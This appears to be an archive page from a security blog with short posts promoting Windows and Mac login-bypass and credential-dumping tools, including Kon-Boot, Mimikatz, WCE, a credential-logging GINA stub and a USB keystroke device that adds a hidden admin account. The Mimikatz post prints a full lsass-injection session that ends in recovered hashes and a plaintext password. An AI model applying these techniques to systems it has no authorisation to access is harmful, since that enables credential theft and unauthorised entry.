TrackSomebody.com

october27thgroup.com pentesting, pci, red team

illmob.org

Kon-Boot 2.5 released with Windows 10 support

October 12th, 2015 by admin in Apple, Privilege Escalation, windows


Kon-Boot is an application which bypasses the authentication process of Windows and Mac based operating systems. This Kon-Boot version works with both 64-bit and 32-bit Microsoft Windows up to version 10 and Mac OSX Mavericks. Works from a Cd, floppy, or USB. Also supports UEFI based systems.

It also includes special feature which gives you a command prompt with system level privileges at the login screen. Easy to use and excellent for tech repairs, data recovery and security audits. They offer personal and professional licences and well worth the cost. Buy your copy today!

Offline NT Password & Registry Editor

March 25th, 2014 by admin in cracking, Privilege Escalation, windows

Offline NT Password & Registry Editor, finally got an update last month after a 4 yr hiatus. The new version of this awesome bootdisk includes support for Win8.1 and a working ‘promote user to admin’ feature among other fixes and driver updates.

2 new commandline functions are:
samusrgrp: a command line tool to add users to groups or remove users from groups. Users and groups must be local (cannot be domain / AD). It can also list the groups with their members in several forms, the output can be used in scripts of course. Listing groups will also list domain users that are members of the group (if any), but it will not be able to look up the name, so it will be listed as a SID only.

sampasswd: Password reset from command line (scriptable) Or list users in SAM file in a few different formats.

More information on these new tools ::here::
The bootdisk can be ran from a floppy,CD, or USB and can be Download from http://pogostick.net/~pnh/ntpasswd/

Kon-Boot v2.3 released

November 19th, 2013 by admin in Apple, Privilege Escalation, windows

The best password bypass program out there has been updated. A few bug fixes and support for Windows 8.1. A must have for any computer technician. I use the product almost daily @ my shop. Whenever a customer drops off a Windows computer and doesn’t know their wife’s/kid’s/gf’s password, or I’m doing on-site work and Mary the secretary is on her lunch break and I need to update her locked computer, this is my goto program. It’s better than a password reset because along with that you also destroy other saved passwords for internet explorer, google products, etc that all use the CryptProtectData function along with your logon password to encrypt data.

Watch the video to see how easy it is to use.

And best of all is the price: $15 for personal license & $75 for Commercial license. The time it saves is definitely worth it 10x over.
More information can be found ::HERE::

p.s they also have an Apple Mac version too.

Capturing Windows Logon Credentials

November 3rd, 2013 by admin in cracking, Privilege Escalation, windows


Microsoft GINA technology which stands for Graphical Identification ‘N Authentication is responsible for graphically handling logon requests when events such as CTRL-ALT-DEL are received. Tyler Wrightson finally released his modified GINA stub that silently logs usernames and domains for XP and Win2k. You can dpwnload it ::here::. More information about how GINA works can be found in his excellent blog post.

This will not work for Vista and later Operating Systems, as they have switched to the Credential Provider model. Microsoft claims the reasoning behind this is to make it easier for developers to meet the demands for next generation authentication technologies (like biometrics, two factor and single sign on). Have no fear he also released a version for Vista/7 ::here::. More information can be found in his blog post.

Kon-Boot 2.1 is out

September 3rd, 2012 by admin in Apple, Privilege Escalation, windows

What’s new in version V2.1?
– Windows 8 support (only standard BIOS, no EFI support)
– Sticky keys feature (allows user to spawn a console window with system admin rights before the user is logged in)

src: http://www.thelead82.com/kon-boot/

CMOS De-Animator

July 2nd, 2012 by admin in BIOS, Privilege Escalation, windows

Sometimes when you can’t enter the BIOS because there is a password, but you can still boot into windows, you can try to use CMOS De-Animator to clear the BIOS settings. Works on both 32 and 64 bit. In the event that it doesn’t work try to use our BIOS password recovery service. CMOS De-Animator can be downloaded from the author’s website ::HERE::

MimiKatz – clear text passwords

March 29th, 2012 by admin in Password Info, windows

As you’ve seen in our previous post about WCE, Windows is storing your password to use for wdigest authentication. Your System needs cleartext passwords for Single Sign On with Terminal Server (tspkg provider) and Windows Digest implementation (wdigest provider). Password are not in cleartext in memory, but with the need to have them in plaintext form for SSO, they are cypher in reversible way. wdigest (the password) is required to support HTTP Digest Authentication and other schemes that require the authenticating party to know the password – and not just the hash. Mimikatz is a tool to recover this plain-text password,it saves you time and power needed to brute force a 16 character NTLM password during pen-testing or tech work. You inject a dll into lsass.exe to recover the information needed. The blog and program are in French http://blog.gentilkiwi.com/mimikatz

Below is a demonstration of how to use mimikatz, all commands typed are in red:
(The privilege::debug command is not required if you are already system.)

C:\Mimikatz\x64>mimikatz
mimikatz 1.0 x64 (alpha) /* Traitement du Kiwi (Feb 9 2012 01:49:24) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d’ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 568
Attente de connexion du client…
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi

SekurLSA : librairie de manipulation des données de sécurités dans LSASS

mimikatz # @getLogonPasswords

Authentification Id         : 0;160179
Package d’authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d’authentification  : TestBox64
        msv1_0 :        lm{ d0e9aee149655a6075e4540af1f22d3b },
ntlm{ cc36cf7a8514893efccd332446158b1a }
        wdigest :       waza1234/
        tspkg :         waza1234/

Windows Credentials Editor (WCE) 1.3 x64 released

March 14th, 2012 by admin in cracking, Password Info, Privilege Escalation, windows

Windows Credentials Editor (WCE) allows to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes and Kerberos tickets). This can be used, for example, to perform pass-the-hash on Windows, obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.) which can be used to perform further attacks, obtain Kerberos tickets and reuse them in other Windows or Unix systems. Also dumps passwords in plain-text without the need to crack the hashes. Supports Windows XP, 2003, Vista, 7 and 2008.

Current Version: WCE v1.3beta (32-bit) (download) – WCE v1.3beta (64-bit) (download)

Frequently Asked Questions (FAQ) available here.

The new threat

February 12th, 2011 by admin in Apple, cracking, Linux, Privilege Escalation, Uncategorized, windows

Programmable embedded devices have the capability of being detected as a HID device , just like a keyboard or mouse. So if you have physical access and a minute alone you can compromise a system with something the size of your thumb. The possibilities are endless, HTTP/FTP download, injecting binaries into debug or Powershell etc.. Also this device is cross platform which means Windows,Linux,UNIX and Apple are all vulnerable.

Here’s an example project we made for a Windows7 box that adds a new Admin user to the system and hides that user from the logon screen. the whole process takes about 16 seconds , with most of the time taken by the device being detected as a keyboard and the driver installed. The device costs about $20 and can be found here

BitLocker password cracker

September 29th, 2010 by admin in cracking, windows

Passware Inc. says it has come up with a way to access files on USB drives secured by the BitLocker encryption feature of Microsoft Windows.

They announced this week the release of Passware Kit Forensic version 10.1. The vendor said its software now lets investigators recover BitLocker encryption keys and getting “full access” to the contents of encrypted disks.

Microsoft added its BitLocker hard-disk encryption feature to the “ultimate” and “enterprise” versions of its Windows Vista and Windows 7 operating systems, in response to greater concern over data losses and breaches. It is also present in Windows Server 2008 and Windows Server 2008 R2.

Passware’s target market is law enforcement, said the company’s marketing manager, Nataly Koukoushkina.

She added users need physical access to computers in order to use Passware to defeat BitLocker encryption.

“That’s not easy for hackers,” she said. “We developed it for investigative purposes only.”

Passware launched the tool at the a training conference held by the High Technology Crime Investigation Association (HTCIA) in Atlanta.

The software costs US$795 and includes a year of free updates, Koukoushkina said, adding the BitLocker feature of Windows stores the encryption keys in a computer’s memory.

“We are using this vulnerability in order to decrypt the BitLocker hard disk,” she said. “Now the enhancement is for portable disk USB drives.”

Passware, who says its customers include the U.S. Department of Defense, makes software designed to either recover or reset software for a variety of document types, including Adobe Acrobat, plus Microsoft  Word, Excel and Access.

The enterprise version will scan machines for password-protected files and scan the physical memory image file for disks encrypted with either BitLocker or TrueCrypt. If a TrueCrypt volume is dismounted, then the Passware software does a brute force attack.

Next Article »